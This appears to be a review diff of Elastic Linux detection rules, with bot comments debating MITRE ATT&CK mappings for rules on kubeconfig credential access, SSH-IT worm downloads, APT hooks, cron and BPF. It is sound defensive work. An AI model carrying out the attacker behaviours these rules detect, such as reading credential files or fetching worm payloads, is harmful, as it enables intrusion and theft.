@@ -114,16 +126,37 @@ file where host.os.type == "linux" and event.type != "deletion" and file.path li framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" -[[rule.threat.technique.subtechnique]] -id = "T1552.001" -name = "Credentials In Files" -reference = "https://attack.mitre.org/techniques/T1552/001/" +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" diff --git a/rules/linux/lateral_movement_ssh_it_worm_download.toml b/rules/linux/lateral_movement_ssh_it_worm_download.toml index a7ae98d712e..d7738588cf4 100644 --- a/rules/linux/lateral_movement_ssh_it_worm_download.toml +++ b/rules/linux/lateral_movement_ssh_it_worm_download.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/21" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] 
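Review bot: The rewrite removes the Credential Access / T1552.001 Credentials In Files mapping from a rule whose query (hunk header: `file where host.os.type == "linux" and event.type != "deletion" and file.path li…`) keys on access to kubeconfig files, i.e. credentials on disk; T1550 describes using the stolen material, not reading the file. Keep a Credential Access entry with T1552.001 alongside the new ones and re-add `"Tactic: Credential Access"` to tags. Separately, the new Initial Access entry places `[rule.threat.tactic]` before `[[rule.threat.technique]]`, unlike the two entries above it; reorder for consistency. The query body is outside the hunk.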
@@ -86,7 +86,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -101,11 +112,26 @@ process where host.os.type == "linux" and event.type == "start" and framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.004" +name = "SSH" +reference = "https://attack.mitre.org/techniques/T1021/004/" + +[[rule.threat.technique]] +id = "T1563" +name = "Remote Service Session Hijacking" +reference = "https://attack.mitre.org/techniques/T1563/" + +[[rule.threat.technique.subtechnique]] +id = "T1563.001" +name = "SSH Hijacking" +reference = "https://attack.mitre.org/techniques/T1563/001/" [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" 
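Review bot: The new mapping drops T1105 Ingress Tool Transfer, which is the technique for the download this rule is named for (`lateral_movement_ssh_it_worm_download`, a `process … event.type == "start"` rule per the hunk header); T1021.004 and T1563.001 describe what the worm does afterwards, not the fetch being detected. Keep the Command and Control entry with T1105 in addition to the new Lateral Movement one and add `"Tactic: Command and Control"` back to tags. The query body is outside the hunk, so the exact download pattern is not visible here.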
diff --git a/rules/linux/lateral_movement_telnet_network_activity_external.toml b/rules/linux/lateral_movement_telnet_network_activity_external.toml index 23ddb98d3b1..40cf153f80e 100644 --- a/rules/linux/lateral_movement_telnet_network_activity_external.toml +++ b/rules/linux/lateral_movement_telnet_network_activity_external.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/23" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -98,7 +98,15 @@ Auditbeat is a lightweight shipper that you can install on your servers to audit - For complete “Setup and Run Auditbeat” information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] type = "eql" query = ''' sequence by process.entity_id @@ -117,11 +125,11 @@ sequence by process.entity_id framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/linux/persistence_apt_package_manager_execution.toml b/rules/linux/persistence_apt_package_manager_execution.toml index 4b6cb28a48d..121bf350707 100644 
--- a/rules/linux/persistence_apt_package_manager_execution.toml +++ b/rules/linux/persistence_apt_package_manager_execution.toml @@ -2,7 +2,7 @@ creation_date = "2024/02/01" integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -83,7 +83,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Resources: Investigation Guide", + "Data Source: Crowdstrike", +] type = "eql" query = ''' sequence by host.id with maxspan=5s 
@@ -125,6 +136,34 @@ sequence by host.id with maxspan=5s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.016" +name = "Installer Packages" +reference = "https://attack.mitre.org/techniques/T1546/016/" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -143,17 +182,7 @@ reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" - -[[rule.threat.technique.subtechnique]] -id = "T1546.016" -name = "Installer Packages" -reference = "https://attack.mitre.org/techniques/T1546/016/" - [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_apt_package_manager_file_creation.toml b/rules/linux/persistence_apt_package_manager_file_creation.toml index bc63025e540..6fa37d13b3e 100644 --- a/rules/linux/persistence_apt_package_manager_file_creation.toml +++ b/rules/linux/persistence_apt_package_manager_file_creation.toml 
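Review bot: The second hunk turns the former Persistence entry into a Defense Evasion entry with no `[[rule.threat.technique]]` at all, so the rule is labelled with a tactic that nothing in the mapping justifies and technique-keyed coverage tooling will not see it under Defense Evasion. T1574 Hijack Execution Flow, already listed under Persistence in the first hunk, is also a Defense Evasion technique, so attach it here: `[[rule.threat.technique]]` / `id = "T1574"` / `name = "Hijack Execution Flow"` ahead of `[rule.threat.tactic]`. The other two APT rules in this patch have the same tactic-only entry.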
@@ -2,7 +2,7 @@ creation_date = "2024/06/03" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -85,7 +85,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -135,6 +143,11 @@ file.path : "/etc/apt/apt.conf.d/*" and not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" @@ -145,7 +158,20 @@ id = "T1546.016" name = "Installer Packages" reference = "https://attack.mitre.org/techniques/T1546/016/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_apt_package_manager_netcon.toml b/rules/linux/persistence_apt_package_manager_netcon.toml index 771e00482fd..7e83bb830d6 100644 --- a/rules/linux/persistence_apt_package_manager_netcon.toml 
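Review bot: The appended Defense Evasion entry is tactic-only, with no technique, so the `"Tactic: Defense Evasion"` tag added above has nothing in the mapping backing it. T1574 Hijack Execution Flow is added under Persistence in the same hunk and is also a Defense Evasion technique; repeat it under the new entry (`[[rule.threat.technique]]` / `id = "T1574"` / `name = "Hijack Execution Flow"`) rather than leaving the tactic empty.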
+++ b/rules/linux/persistence_apt_package_manager_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2024/02/01" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -83,7 +83,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Command and Control", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' sequence by host.id with maxspan=5s @@ -108,22 +117,9 @@ sequence by host.id with maxspan=5s framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" [[rule.threat.technique]] id = "T1546" 
@@ -135,7 +131,28 @@ id = "T1546.016" name = "Installer Packages" reference = "https://attack.mitre.org/techniques/T1546/016/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_at_job_creation.toml b/rules/linux/persistence_at_job_creation.toml index 515d9e16b55..c0e77855ab2 100644 --- a/rules/linux/persistence_at_job_creation.toml +++ b/rules/linux/persistence_at_job_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/31" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -130,9 +130,9 @@ name = "At" reference = "https://attack.mitre.org/techniques/T1053/002/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -148,9 +148,9 @@ name = "At" reference = "https://attack.mitre.org/techniques/T1053/002/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" 
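Review bot: Both appended entries, Command and Control and Defense Evasion, are tactic-only with no `[[rule.threat.technique]]`, so the rule now claims two tactics that nothing in the mapping supports. T1574 Hijack Execution Flow (added under Persistence in this hunk) is also a Defense Evasion technique and belongs under that entry; for Command and Control, a rule named `…apt_package_manager_netcon` that sequences a network connection after the package hook would normally carry T1071 or T1105, whichever the query supports. The query is outside the hunk, so which C2 technique fits is not visible here; pick one rather than shipping empty entries.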
@@ -166,6 +166,6 @@ name = "At" reference = "https://attack.mitre.org/techniques/T1053/002/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/persistence_boot_file_copy.toml b/rules/linux/persistence_boot_file_copy.toml index 2e4260eed94..291d6f8eaa7 100644 --- a/rules/linux/persistence_boot_file_copy.toml +++ b/rules/linux/persistence_boot_file_copy.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] @@ -77,7 +77,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -122,20 +130,43 @@ id = "T1542" name = "Pre-OS Boot" reference = "https://attack.mitre.org/techniques/T1542/" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1542" -name = "Pre-OS Boot" -reference = "https://attack.mitre.org/techniques/T1542/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_bpf_probe_write_user.toml b/rules/linux/persistence_bpf_probe_write_user.toml index 000429e62b0..7e66f75cc0d 100644 --- a/rules/linux/persistence_bpf_probe_write_user.toml +++ b/rules/linux/persistence_bpf_probe_write_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/28" integration = ["system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [rule] author = ["Elastic"] 
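Review bot: The tags hunk earlier in this file cuts tags down to `"Tactic: Persistence"` only, but this hunk adds threat entries for Execution (T1059.004) and Defense Evasion, so `tags` and `rule.threat` disagree and any tag/tactic consistency check will report `Tactic: Execution` and `Tactic: Defense Evasion` as missing. Add both to tags. Also, the removed Defense Evasion entry carried T1542 Pre-OS Boot while the new one has no technique; keep `id = "T1542"` / `name = "Pre-OS Boot"` under Defense Evasion, where ATT&CK also lists it, instead of a tactic-only entry.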
@@ -76,7 +76,14 @@ Filebeat is a lightweight shipper for forwarding and centralizing log data. Inst - To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" query = ''' @@ -86,6 +93,23 @@ host.os.type:linux and event.dataset:"system.syslog" and process.name:kernel and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.006" +name = "Kernel Modules and Extensions" +reference = "https://attack.mitre.org/techniques/T1547/006/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1014" name = "Rootkit" diff --git a/rules/linux/persistence_bpf_program_or_map_load.toml b/rules/linux/persistence_bpf_program_or_map_load.toml index 7f6ca634f5e..af4757fbc16 100644 --- a/rules/linux/persistence_bpf_program_or_map_load.toml +++ b/rules/linux/persistence_bpf_program_or_map_load.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/20" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/20" [rule] author = ["Elastic"] 
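Review bot: The added Persistence entry ends with `+framework = "MITRE ATT&CK"` running straight into the existing `[[rule.threat.technique]]` for T1014 with no blank line, unlike every other entry in this patch; insert one. On the mapping itself, T1547.006 Kernel Modules and Extensions covers loadable modules and kernel extensions, whereas this rule keys on the `bpf_probe_write_user` helper being used, so the Persistence claim looks like a stretch; the neighbouring rule below applies the same pair to BPF program/map loads, which is at least closer. Worth a second opinion from whoever owns the Linux mappings before both rules inherit it.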
@@ -62,7 +62,20 @@ references = [ risk_score = 47 rule_id = "2d05fefd-40ba-43ae-af0c-3c25e86b54f1" severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Threat: Rootkit", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Threat: Rootkit", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -78,6 +91,24 @@ process.name == "bpftool" and ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.006" +name = "Kernel Modules and Extensions" +reference = "https://attack.mitre.org/techniques/T1547/006/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1014" name = "Rootkit" diff --git a/rules/linux/persistence_chkconfig_service_add.toml b/rules/linux/persistence_chkconfig_service_add.toml index 564eb7dc63f..554ad767f59 100644 --- a/rules/linux/persistence_chkconfig_service_add.toml +++ b/rules/linux/persistence_chkconfig_service_add.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/22" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [transform] [[transform.osquery]] 
@@ -196,11 +196,6 @@ id = "T1037" name = "Boot or Logon Initialization Scripts" reference = "https://attack.mitre.org/techniques/T1037/" -[[rule.threat.technique.subtechnique]] -id = "T1037.004" -name = "RC Scripts" -reference = "https://attack.mitre.org/techniques/T1037/004/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_credential_access_modify_ssh_binaries.toml b/rules/linux/persistence_credential_access_modify_ssh_binaries.toml index 6d78f771a3b..523302ed1a5 100644 --- a/rules/linux/persistence_credential_access_modify_ssh_binaries.toml +++ b/rules/linux/persistence_credential_access_modify_ssh_binaries.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/21" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/22" [transform] [[transform.osquery]] @@ -145,7 +145,17 @@ Auditbeat is a lightweight shipper that you can install on your servers to audit - For complete “Setup and Run Auditbeat” information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Persistence", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" query = ''' 
@@ -172,6 +182,19 @@ not (
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
+[[rule.threat.technique]]
+id = "T1543"
+name = "Create or Modify System Process"
+reference = "https://attack.mitre.org/techniques/T1543/"
+
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1556"
 name = "Modify Authentication Process"
@@ -186,11 +209,26 @@ reference = "https://attack.mitre.org/tactics/TA0006/"
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1556"
-name = "Modify Authentication Process"
-reference = "https://attack.mitre.org/techniques/T1556/"
+id = "T1021"
+name = "Remote Services"
+reference = "https://attack.mitre.org/techniques/T1021/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1021.004"
+name = "SSH"
+reference = "https://attack.mitre.org/techniques/T1021/004/"
+
+[[rule.threat.technique]]
+id = "T1563"
+name = "Remote Service Session Hijacking"
+reference = "https://attack.mitre.org/techniques/T1563/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1563.001"
+name = "SSH Hijacking"
+reference = "https://attack.mitre.org/techniques/T1563/001/"
 
 [rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
+id = "TA0008"
+name = "Lateral Movement"
+reference = "https://attack.mitre.org/tactics/TA0008/"
diff --git a/rules/linux/persistence_cron_job_creation.toml b/rules/linux/persistence_cron_job_creation.toml
index 3b65170c93f..752d0925262 100644
--- a/rules/linux/persistence_cron_job_creation.toml
+++ b/rules/linux/persistence_cron_job_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/06/09"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/22"
 
 [transform]
 [[transform.osquery]]
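Review bot: The Persistence entry added in the `@@ -172,6 +182,19 @@` hunk maps T1543 (Create or Modify System Process), while the `@@ -186,11 +209,26 @@` hunk on the same line removes T1556 from the Persistence tactic; on ATT&CK, T1556 Modify Authentication Process is itself listed under Persistence, and it describes a tampered ssh/sshd binary more directly than a created or modified system service does. Unless the intent is to stop mapping the authentication-process technique to Persistence, keeping `id = "T1556"` under TA0003 (with T1543 added only if the rule also covers service changes) is the more precise mapping. The new Lateral Movement entry (T1021.004, T1563.001) and the `Tactic: Lateral Movement` tag in the earlier tags hunk are consistent with each other.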
@@ -164,7 +164,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Persistence",
+ "Tactic: Privilege Escalation",
+ "Tactic: Execution",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -218,9 +227,9 @@ name = "Cron"
 reference = "https://attack.mitre.org/techniques/T1053/003/"
 
 [rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
@@ -236,6 +245,24 @@ name = "Cron"
 reference = "https://attack.mitre.org/techniques/T1053/003/"
 
 [rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1053"
+name = "Scheduled Task/Job"
+reference = "https://attack.mitre.org/techniques/T1053/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1053.003"
+name = "Cron"
+reference = "https://attack.mitre.org/techniques/T1053/003/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/linux/persistence_dbus_service_creation.toml b/rules/linux/persistence_dbus_service_creation.toml
index 82ce58f171f..386571da585 100644
--- a/rules/linux/persistence_dbus_service_creation.toml
+++ b/rules/linux/persistence_dbus_service_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/01/16"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/22"
 
 [rule]
 author = ["Elastic"]
@@ -134,9 +134,9 @@ file.extension in ("service", "conf") and file.path like (
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1546"
-name = "Event Triggered Execution"
-reference = "https://attack.mitre.org/techniques/T1546/"
+id = "T1543"
+name = "Create or Modify System Process"
+reference = "https://attack.mitre.org/techniques/T1543/"
 
 [rule.threat.tactic]
 id = "TA0003"
